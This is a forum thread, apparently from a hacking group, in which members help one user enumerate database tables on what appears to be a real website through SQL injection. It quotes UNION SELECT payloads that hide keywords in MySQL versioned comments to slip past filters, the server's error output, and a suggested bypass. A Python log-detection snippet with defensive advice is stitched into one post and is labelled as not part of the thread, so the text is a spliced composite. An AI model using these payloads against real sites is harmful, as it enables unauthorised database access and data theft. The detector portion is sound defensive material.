Need help for SQL Injection

09-18-2014, 02:31 AM #1
jibon57 Offline TeaM MaDLeeTs ***
Hello,

I was trying to get the table list using SQL injection like this:

Code:
product.php?id=100'
Output
Code:
Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in /home/ionc/public_html/product.php on line 5
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' ) ORDER BY serial ASC' at line 7
After
Code:
product.php?id=-100+/*!50000UNION*/+/*!50000SELECT*/+1,2,3,concat/*!50000(0x3c62723e,table_name)*/,4,5,6,7,8,9+from+/*!information_schema*/.tables+where+/*!table_schema*/=database()--+
Output
Code:
Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in /home/ionc/public_html/product.php on line 5
Operand should contain 1 column(s)
What should I do next? Any suggestions, please. Thanks in advance.

09-18-2014, 03:14 AM #2
T3N38R15 Offline ? lawless-coder *****
Please post the link here. We can't help you with nearly no information.

P.S. Try it over error-based.


09-24-2014, 05:41 AM #3
SysToxic Offline TeaM MaDLeeTs ***
Try id=-100' perhaps.

09-25-2014, 01:39 AM #4
T3N38R15 Offline ? lawless-coder *****
SysToxic, nice try, but he already did that and it drops an error.
But you can try this bypass:
Code:
-100)+/*!50000UNION*/+/*!50000SELECT*/+1,2,3,concat/*!50000(0x3c62723e,table_name)*/,4,5,6,7,8,9+from+/*!information_schema*/.tables+where+/*!table_schema*/=database()--+
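
For defenders reviewing web server logs: the requests quoted in this thread wrap UNION, SELECT and information_schema in MySQL versioned comments (`/*!50000...*/`), whose body MySQL executes, so keyword filters that look only at the raw string miss them. The following Python is an added example, not part of any post in the thread; the function names, rule names and sample query strings are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# MySQL runs the body of /*!NNNNN ... */ "versioned" comments as SQL, so they
# must be unwrapped (body kept), not deleted like ordinary /* ... */ comments.
VERSIONED = re.compile(r"/\*!\d*(.*?)\*/", re.S)
PLAIN = re.compile(r"/\*.*?\*/", re.S)
UNION_SELECT = re.compile(r"\bunion\b\s+(?:all\s+|distinct\s+)?select\b", re.I)
SCHEMA = re.compile(r"\binformation_schema\b", re.I)


def normalize(query_string):
    """URL-decode, unwrap versioned comments, blank out plain comments."""
    text = unquote_plus(query_string)
    text = VERSIONED.sub(r" \1 ", text)
    text = PLAIN.sub(" ", text)
    return re.sub(r"\s+", " ", text).strip()


def classify(query_string):
    """Return the names of the rules a raw query string trips, in fixed order."""
    decoded = unquote_plus(query_string)
    text = normalize(query_string)
    hits = []
    if VERSIONED.search(decoded):
        hits.append("versioned-comment")
    if UNION_SELECT.search(text):
        hits.append("union-select")
    if SCHEMA.search(text):
        hits.append("schema-enumeration")
    return hits


# Constructed sample query strings (not real traffic); the second and third
# mirror the shape of the requests quoted in the thread.
SAMPLES = [
    "id=100",
    "id=-100+/*!50000UNION*/+/*!50000SELECT*/+1,2+from+/*!information_schema*/.tables",
    "id=1%2F%2A%2150000UNION%2A%2F%2F%2A%2A%2FSELECT+1",
    "q=student+union+events",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"{classify(s)!s:55} {s}")
```

A hit is a signal for alerting and log triage only. The errors shown in the first post (raw SQL syntax messages and a file path in the response) point at the underlying fixes: bind `id` as a parameter in the query and turn off error display to clients.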


09-25-2014, 04:07 AM #5
SysToxic Offline TeaM MaDLeeTs ***
T3N38R15,

Bro, I know, but URL does not have. I do not speak the exact.

09-25-2014, 04:10 AM #6
T3N38R15 Offline ? lawless-coder *****
Sorry bro, I don't understand you.
What did you mean by "I do not speak the exact"?


09-25-2014, 04:16 AM #7
SysToxic Offline TeaM MaDLeeTs ***
Sorry, I have bad English.

Never mind.

09-25-2014, 04:18 AM #8
T3N38R15 Offline ? lawless-coder *****
No problem.
But please try your best to speak English here so that all can understand you.


09-25-2014, 04:22 AM #9
SysToxic Offline TeaM MaDLeeTs ***
I understand.





